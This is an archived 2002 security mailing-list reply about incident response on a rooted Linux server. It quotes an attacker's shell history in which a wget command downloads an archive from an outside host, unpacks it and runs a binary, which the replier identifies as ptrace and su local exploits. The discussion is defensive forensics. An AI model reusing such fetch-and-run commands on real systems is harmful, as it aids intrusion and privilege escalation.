Re: Rooted, .haos on system
From: Carlos Eduardo Pedroza Santiviago (segfault@brturbo.com)
Date: 12/16/02
- Previous message: zeno: "Re: Rooted, .haos on system"
- In reply to: Damian Gerow: "Re: Rooted, .haos on system"
- Next in thread: Damian Gerow: "Re: Rooted, .haos on system"
- Reply: Damian Gerow: "Re: Rooted, .haos on system"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Mon, 16 Dec 2002 18:31:03 -0200 From: Carlos Eduardo Pedroza Santiviago <segfault@brturbo.com> To: incidents@securityfocus.com
On Mon, 16 Dec 2002 13:47:28 -0500
Damian Gerow <damian@sentex.net> wrote:
> On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:
> > On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:
> > > I've just received word that one of our customers was rooted, and he's
> > > asking about the file ".haos". Nothing rings any bells, has anyone heard
> > > of it?
> >
> > Just a quick update to this...
>
> And one last tidbit...
>
> Left in the .bash_history was this:
>
> w
> cd /tmp
> wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
> ./epc
>
> A quick check tells me that 'epc' is a backdoor utility, and the other
> file contained within loc.tgz looks like a trojaned 'su'.
No, for me this looks like:
epc -> ptrace local exploit
su -> su local exploit
They're old ***, and i guess your system wasn't updated.
>
> I've already notified Geocities abuse, and haven't heard back from them
> yet.
>
Good luck,
-- Carlos Eduardo Pedroza Santiviago -- <segfault@*NO_SPAM*brturbo.com> Key id/fp = 4B5EB579/A817 71A3 AA78 1997 65DA 0665 A341 D4A4 4B5E B579
- application/pgp-signature attachment: stored
- Next message: zeno: "Re: Rooted, .haos on system"
- Previous message: zeno: "Re: Rooted, .haos on system"
- In reply to: Damian Gerow: "Re: Rooted, .haos on system"
- Next in thread: Damian Gerow: "Re: Rooted, .haos on system"
- Reply: Damian Gerow: "Re: Rooted, .haos on system"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
